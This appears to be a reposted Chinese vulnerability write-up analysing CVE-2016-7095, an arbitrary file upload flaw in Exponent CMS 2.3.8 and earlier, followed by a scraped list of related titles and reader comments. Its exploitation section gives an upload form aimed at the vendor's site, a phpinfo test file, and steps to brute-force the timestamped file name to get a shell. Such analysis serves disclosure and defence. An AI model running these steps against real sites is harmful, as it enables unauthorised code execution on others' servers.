【原创技术分享】Exponent-cms任意文件上传漏洞分析 (cve-2016-7095)
来源:互联网 发布:小米6 移动4g网络差 编辑:程序博客网 时间:2024/05/30 07:13
作者:Balisong
稿费:500RMB
Exponent cms是一款国外的cms,功能比较强大。但是在2.3.8版本及以下,存在着一个全版本通杀的任意文件上传漏洞。攻击者可以通过该漏洞直接getshell.
官方最新版2.3.9已经修复(http://www.exponentcms.org)
漏洞分析:
我们首先看一下漏洞触发点在:
/framework/modules/ecommerce/controllers/eventregistrationController.php中第1161行:
if
(!
empty
(
$_FILES
[
'attach'
][
'size'
])) {
$dir
=
'tmp'
;
$filename
= expFile::fixName(time() .
'_'
.
$_FILES
[
'attach'
][
'name'
]);
$dest
=
$dir
.
'/'
.
$filename
;
//Check to see if the directory exists. If not, create the directory structure.
if
(!
file_exists
(BASE.
$dir
)) expFile::makeDirectory(
$dir
);
// Move the temporary uploaded file into the destination directory, and change the name.
$file
= expFile::moveUploadedFile(
$_FILES
[
'attach'
][
'tmp_name'
], BASE .
$dest
);
// $finfo = finfo_open(FILEINFO_MIME_TYPE);
// $relpath = str_replace(PATH_RELATIVE, '', BASE);
// $ftype = finfo_file($finfo, BASE.$dest);
// finfo_close($finfo);
if
(!
empty
(
$file
))
$mail
->attach_file_on_disk(BASE .
$file
, expFile::getMimeType(BASE .
$file
));
}
$from
=
array
(ecomconfig::getConfig(
'from_address'
) => ecomconfig::getConfig(
'from_name'
));
if
(
empty
(
$from
[0]))
$from
= SMTP_FROMADDRESS;
$mail
->quickBatchSend(
array
(
'headers'
=>
$headers
,
'html_message'
=>
$this
->params[
'email_message'
],
'text_message'
=>
strip_tags
(
str_replace
(
"<br>"
,
""
,
$this
->params[
'email_message'
])),
'to'
=>
$email_addy
,
'from'
=>
$from
,
'subject'
=>
$this
->params[
'email_subject'
]
));
if
(!
empty
(
$file
))unlink(BASE .
$file
);
// delete temp file attachment
flash(
'message'
, gt(
"You're email to event registrants has been sent."
));
expHistory::back();
}
然后我们可以看到这里有一个文件上传的操作,我们跟踪一下moveUploadedFile函数,在/framework/modules/file/models/expFile.php中第1508行:
public
static
function
moveUploadedFile(
$tmp_name
,
$dest
) {
move_uploaded_file(
$tmp_name
,
$dest
);
if
(
file_exists
(
$dest
)) {
$__oldumask
= umask(0);
chmod
(
$dest
, octdec(FILE_DEFAULT_MODE_STR + 0));
umask(
$__oldumask
);
return
str_replace
(BASE,
''
,
$dest
);
}
else
return
null;
}
这里没有对后缀名进行一个检测,可以上传任意文件。文件命名的方式是time()+下划线+文件名。
然后我们看到紧跟着就有一个文件删除的操作:
if (!empty($file))unlink(BASE . $file);
看起来是没有问题的,传上去之后立马删除掉了,因为文件存在的时间超级短,并且文件命名的方式里面带有时间戳,导致我们无法利用这个文件。
但是这里有个细节,就是在上传文件到删除文件的过程中,调用了一个函数操作:
也就是
$mail
->quickBatchSend(
array
(
'headers'
=>
$headers
,
'html_message'
=>
$this
->params[
'email_message'
],
'text_message'
=>
strip_tags
(
str_replace
(
"<br>"
,
""
,
$this
->params[
'email_message'
])),
'to'
=>
$email_addy
,
'from'
=>
$from
,
'subject'
=>
$this
->params[
'email_subject'
]
));
我们开始跟踪一下该函数:
在/framework/core/subsystems/expMail.php中第378行:
public
function
quickBatchSend(
$params
=
array
()) {
if
(
empty
(
$params
[
'html_message'
]) &&
empty
(
$params
[
'text_message'
])) {
return
false;
}
// set up the to address(es)
if
(
is_array
(
$params
[
'to'
])) {
$params
[
'to'
] =
array_filter
(
$params
[
'to'
]);
}
else
{
$params
[
'to'
] =
array
(trim(
$params
[
'to'
]));
}
if
(
empty
(
$params
[
'to'
])) {
$params
[
'to'
] =
array
(trim(SMTP_FROMADDRESS));
// default address is ours
}
$this
->addTo(
$params
[
'to'
]);
// we only do this to save addresses in our object
// set up the from address(es)
if
(
is_array
(
$params
[
'from'
])) {
$params
[
'from'
] =
array_filter
(
$params
[
'from'
]);
}
else
{
$params
[
'from'
] = trim(
$params
[
'from'
]);
}
在这里又调用了一个函数addto(),我们继续跟踪该函数,在该文件的 644行:
public
function
addTo(
$email
= null) {
// attempt to fix a bad to address
if
(
is_array
(
$email
)) {
foreach
(
$email
as
$address
=>
$name
) {
if
(
is_integer
(
$address
)) {
if
(
strstr
(
$name
,
'.'
) === false) {
$email
[
$address
] .=
$name
.
'.net'
;
}
}
}
}
else
{
if
(
strstr
(
$email
,
'.'
) === false) {
$email
.=
'.net'
;
}
}
$this
->to =
$email
;
if
(!
empty
(
$email
)) {
$this
->message->setTo(
$email
);
//fixme this resets the 'to' addresses, unless using $this->message->addTo($email);
// $this->message->addTo($email); //if you need to reset the 'to' addresses, use $this->flushRecipients();
}
}
这里又调用了一个setTo()函数,我们继续跟踪该函数,在/external/swiftmailer-5.4.2/lib/classes/Swift/Mime/SimpleMessage.php中第316行:
public
function
setTo(
$addresses
,
$name
= null)
{
if
(!
is_array
(
$addresses
) && isset(
$name
)) {
$addresses
=
array
(
$addresses
=>
$name
);
}
if
(!
$this
->_setHeaderFieldModel(
'To'
, (
array
)
$addresses
)) {
$this
->getHeaders()->addMailboxHeader(
'To'
, (
array
)
$addresses
);
}
return
$this
;
}
这里调用了一个addMailboxHeader函数,我们继续追踪该函数,在/external/swiftmailer-5.4.2/lib/classes/Swift/Mime/SimpleHeaderSet.php中第65行:
public
function
addMailboxHeader(
$name
,
$addresses
= null)
{
$this
->_storeHeader(
$name
,
$this
->_factory->createMailboxHeader(
$name
,
$addresses
));
}
这里又调用了一个createMailboxHeader函数,我们继续跟踪,在/external/swiftmailer-5.4.2/lib/classes/Swift/Mime/SimpleHeaderFactory.php中第54行:
public
function
createMailboxHeader(
$name
,
$addresses
= null)
{
$header
=
new
Swift_Mime_Headers_MailboxHeader(
$name
,
$this
->_encoder,
$this
->_grammar);
if
(isset(
$addresses
)) {
$header
->setFieldBodyModel(
$addresses
);
}
$this
->_setHeaderCharset(
$header
);
return
$header
;
}
这里又调用到了一个setFieldBodyModel函数,我们继续跟踪, /external/swiftmailer-5.4.2/lib/classes/Swift/Mime/Headers/MailboxHeader.php中第61行:
public
function
setFieldBodyModel(
$model
)
{
$this
->setNameAddresses(
$model
);
}
这里调用了一个setNameAddresses函数,我们继续跟踪该函数,在该文件104行:
public
function
setNameAddresses(
$mailboxes
)
{
$this
->_mailboxes =
$this
->normalizeMailboxes((
array
)
$mailboxes
);
$this
->setCachedValue(null);
//Clear any cached value
}
这里又调用了normalizeMailboxes函数,我们继续跟踪该函数,在该文件的250行:
这里调用了一个_assertValidAddress函数,我们继续跟踪该函数,在该文件的第344行:
private
function
_assertValidAddress(
$address
)
{
echo
$this
->getGrammar()->getDefinition(
'addr-spec'
);
if
(!preg_match(
'/^'
.
$this
->getGrammar()->getDefinition(
'addr-spec'
).
'$/D'
,
$address
)) {
throw
new
Swift_RfcComplianceException(
'Address in mailbox given ['
.
$address
.
'] does not comply with RFC 2822, 3.6.2.'
);
}
}
可以看到这里对于我们传入的$address做了一个正则匹配,如果正则不匹配的话,就会throw出错误信息,导致运行的程序运行的中止。那么结合我们上面所说的,这个步骤是在上传文件完成之后,删除文件之前执行的,如果这个步骤出了错,那么就不会对上传文件进行删除。那么我们上传的文件就存活了下来。
那么怎样让这个正则匹配失效呢?
可以看到这个正则匹配是验证你是否是有效的邮箱地址,如果不是有效的邮箱地址就会报错,那么我们传入一个错误的邮箱地址的话,就会报错了。但是这里我们不这么“简单”的做,我们搞一点有意思的事情。
我们首先看一下我们参数传入的地方:
在/framework/modules/ecommerce/controllers/eventregistrationController.php中第1149行:
$email_addy
=
array_flip
(
array_flip
(
$this
->params[
'email_addresses'
]));
$email_addy
=
array_map
(
'trim'
,
$email_addy
);
$email_addy
=
array_filter
(
$email_addy
);
这里的$email_addy是我们可控的。用户正常的输入的话,这个地方$this->params['email_addresses']应该是一个数组,然后后面的一切都能正规的运行下去,不会出错,但是!!!如果这个地方我们不传入数组会怎么样?正如大家知道的,array_flip()是对数组进行操作的,但是如果我们给它传入一个字符串的话,那么结果会返回一个null,意思就是说现在$email_addy=NULL。然后我们看到将$email_addy带入到了quickBatchSend函数中去:
$mail
->quickBatchSend(
array
(
'headers'
=>
$headers
,
'html_message'
=>
$this
->params[
'email_message'
],
'text_message'
=>
strip_tags
(
str_replace
(
"<br>"
,
""
,
$this
->params[
'email_message'
])),
'to'
=>
$email_addy
,
'from'
=>
$from
,
'subject'
=>
$this
->params[
'email_subject'
]
));
在quickBatchSend中又对$email_addy做了处理:
if
(
is_array
(
$params
[
'to'
])) {
$params
[
'to'
] =
array_filter
(
$params
[
'to'
]);
}
else
{
$params
[
'to'
] =
array
(trim(
$params
[
'to'
]));
}
if
(
empty
(
$params
[
'to'
])) {
$params
[
'to'
] =
array
(trim(SMTP_FROMADDRESS));
// default address is ours
}
$this
->addTo(
$params
[
'to'
]);
// we only do this to save addresses in our object
首先会判断是否是数组,如果不是的话,就变成一个数组。我们知道开始$Params[‘to’]为NULL,经过强行转换之后现在的$param[‘to’]就是array(0=>””),接下来的判断很有意思,:
if
(
empty
(
$params
[
'to'
]))
你觉得是true还是false呢?很多人认为会是ture,但是实际上是false。因为这个数组不是空数组,它有一个元素啊!!,虽然只是一个空字符串,但是它还是有元素啊,所以数组不为空,这个条件不成立。也就不会有赋值默认邮箱的操作:
$params
[
'to'
] =
array
(trim(SMTP_FROMADDRESS));
// default address is ours
然后将$params[‘to’]传递给了addTo函数,我们看一下addTo函数是怎样处理$params[‘to’]的:
public
function
addTo(
$email
= null) {
// attempt to fix a bad to address
if
(
is_array
(
$email
)) {
foreach
(
$email
as
$address
=>
$name
) {
if
(
is_integer
(
$address
)) {
if
(
strstr
(
$name
,
'.'
) === false) {
$email
[
$address
] .=
$name
.
'.net'
;
}
}
}
}
else
{
if
(
strstr
(
$email
,
'.'
) === false) {
$email
.=
'.net'
;
}
}
$this
->to =
$email
;
if
(!
empty
(
$email
)) {
$this
->message->setTo(
$email
);
里经过处理后,$email的值为array(1) { [0]=> string(4) ".net" }。然后传递给了setTo做操作:
public
function
setTo(
$addresses
,
$name
= null)
{
if
(!
is_array
(
$addresses
) && isset(
$name
)) {
$addresses
=
array
(
$addresses
=>
$name
);
}
if
(!
$this
->_setHeaderFieldModel(
'To'
, (
array
)
$addresses
)) {
$this
->getHeaders()->addMailboxHeader(
'To'
, (
array
)
$addresses
);
}
return
$this
;
}
将参数传递给了addMailboxHeader,我们看一下该函数的操作:
public
function
addMailboxHeader(
$name
,
$addresses
= null)
{
$this
->_storeHeader(
$name
,
$this
->_factory->createMailboxHeader(
$name
,
$addresses
));
}
又将$address给了createMailboxHeader函数,我们继续看操作:
public
function
createMailboxHeader(
$name
,
$addresses
= null)
{
$header
=
new
Swift_Mime_Headers_MailboxHeader(
$name
,
$this
->_encoder,
$this
->_grammar);
if
(isset(
$addresses
)) {
$header
->setFieldBodyModel(
$addresses
);
}
$this
->_setHeaderCharset(
$header
);
return
$header
;
}
又给了setFieldbodyModel函数,我们继续看:
public
function
setFieldBodyModel(
$model
)
{
$this
->setNameAddresses(
$model
);
}
又给了setNameAddresses函数,我们继续追踪该函数:
public
function
setNameAddresses(
$mailboxes
)
{
$this
->_mailboxes =
$this
->normalizeMailboxes((
array
)
$mailboxes
);
$this
->setCachedValue(null);
//Clear any cached value
}
又给了normalizeMailboxes函数:
protected
function
normalizeMailboxes(
array
$mailboxes
)
{
$actualMailboxes
=
array
();
foreach
(
$mailboxes
as
$key
=>
$value
) {
if
(
is_string
(
$key
)) {
//key is email addr
$address
=
$key
;
$name
=
$value
;
}
else
{
$address
=
$value
;
$name
= null;
}
$this
->_assertValidAddress(
$address
);
$actualMailboxes
[
$address
] =
$name
;
}
return
$actualMailboxes
;
}
经过这个函数处理之后,$address变成了字符串’.net’。然后将这个字符串给了_assertValidAddress做一个正则匹配是不是有效邮箱:
private
function
_assertValidAddress(
$address
)
{
if
(!preg_match(
'/^'
.
$this
->getGrammar()->getDefinition(
'addr-spec'
).
'$/D'
,
$address
)) {
throw
new
Swift_RfcComplianceException(
'Address in mailbox given ['
.
$address
.
'] does not comply with RFC 2822, 3.6.2.'
);
}
}
很显然,’.net’并不能与之相匹配,所以就抛出了一个错误。
导致程序的终止运行,也导致了程序的文件删除操作无法执行。
但是我们开始说了文件名的命名规则是time()+’_’+文件名。
那么我们如何知道time()呢?
在/framework/modules/ecommerce/controllers/eventregistrationController.php中第129行:
function
eventsCalendar() {
global
$user
;
expHistory::set(
'viewable'
,
$this
->params);
$time
= isset(
$this
->params[
'time'
]) ?
$this
->params[
'time'
] : time();
assign_to_template(
array
(
'time'
=>
$time
));
这里直接将time()打印到了网站源码里,我们可以从这个地方得到一个大概的time值,然后便可以进行一个爆破文件名的操作,这样我们就能够getshell。
漏洞利用:
以程序官网为例
构造一个上传表单:
<html>
<body>
<form
action=
"http://www.exponentcms.org/index.php?module=eventregistration&action=emailRegistrants&email_addresses=123456789@123.com&email_message=1&email_subject=1"
method=
"post"
enctype=
"multipart/form-data"
>
<label
for
=
"file"
>Filename:</label>
<input type=
"file"
name=
"attach"
id=
"file"
/>
<br />
<input type=
"submit"
name=
"submit"
value=
"Submit"
/>
</form>
</body>
</html>
然后选择我们的php文件,文件名为index.php:
<?php phpinfo();?>
然后点击上传之后,可以看到报错了:
这个时候我们紧接着快速的访问
www.exponentcms.org/index.php?module=eventregistration&action=eventsCalendar
然后右键查看网页源代码找到rel:
记下这个数字,这就是大概的时间戳,我们爆破文件名需要用到的。
然后我们开始爆破文件名:
/tmp/时间戳_index.php
因为我们得到的时间戳比上传的时间戳要晚一些时间(所以说越快访问越好),但是爆破的位数基本可以控制在3位数以内。
然后我们就可以用burpsuite进行一个爆破文件名的操作:
Status为200表示我们成功爆破到了文件名,我们访问一下,可以看到php文件确实成功上传:
本文由 安全客 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/learning/detail/3001.html
- 【原创技术分享】Exponent-cms任意文件上传漏洞分析 (cve-2016-7095)
- [漏洞分析] Wolf CMS 0.8.2中任意文件上传漏洞
- PHP任意文件上传漏洞(CVE-2015-2348)
- Tomcat任意文件上传漏洞CVE-2017-12615复现测试
- PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
- 【技术分享】CVE-2016-4656:苹果Pegasus漏洞技术分析详解
- PHPCMS最新版任意文件上传漏洞分析
- [漏洞分析] BlackCat CMS 1.1.1任意文件下载
- Wolf CMS 新旧两个版本中的文件上传漏洞分析
- CVE-2016-1503 漏洞分析
- 图片文件上传技术分享 By ZoomLa!CMS
- ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析
- fckeditor任意文件上传漏洞
- PHP任意文件上传漏洞
- tomcat 漏洞 CVE-2016-1240 分析报告
- Adobe Flash Player CVE-2012-0779漏洞技术分析
- 【技术分享】TP-Link WR841N路由器任意代码执行漏洞分析(附演示视频)
- F2blog XMLRPC 上传任意文件漏洞
- TheFatRat:Msfvenom傻瓜化后门生成工具
- 【技术分享】BlackHat2016——JDNI注入/LDAP Entry污染攻击技术研究
- MySQL 5.5.45 (x64) - Local Credentials Disclosure
- How To Test your Firewall Configuration with Nmap and Tcpdump
- 【技术分享】手把手教你如何构造office漏洞POC(第一期)
- 【原创技术分享】Exponent-cms任意文件上传漏洞分析 (cve-2016-7095)
- Summary Ranges
- How I was able to read Uber logs and internal emails.
- Tokyo Westerns/MMA CTF - Rotten Uploader
- The Top 10 Most Popular Security Projects on GitHub Read more: http://news.softpedia.com/news/the-t
- 【COCOS2DX-BOX2D游戏开发之三】 读取tiledmap的tmx阻挡(转)
- 导教班,我的职业续航加油站
- SparkEnv
- Theano 初探(一)
分析和复现了这个漏洞,我的膝盖情不自禁的弯在了地上,请收了他
复现和分析完这个漏洞,我的膝盖情不自禁的弯了下去
我感觉很害怕
膜拜我刀师傅
膜拜我刀师傅
支持的。。。查看源代码就看到了。有插件也会自动识别的啊...
为什么不支持rss订阅?
为什么不支持rss订阅?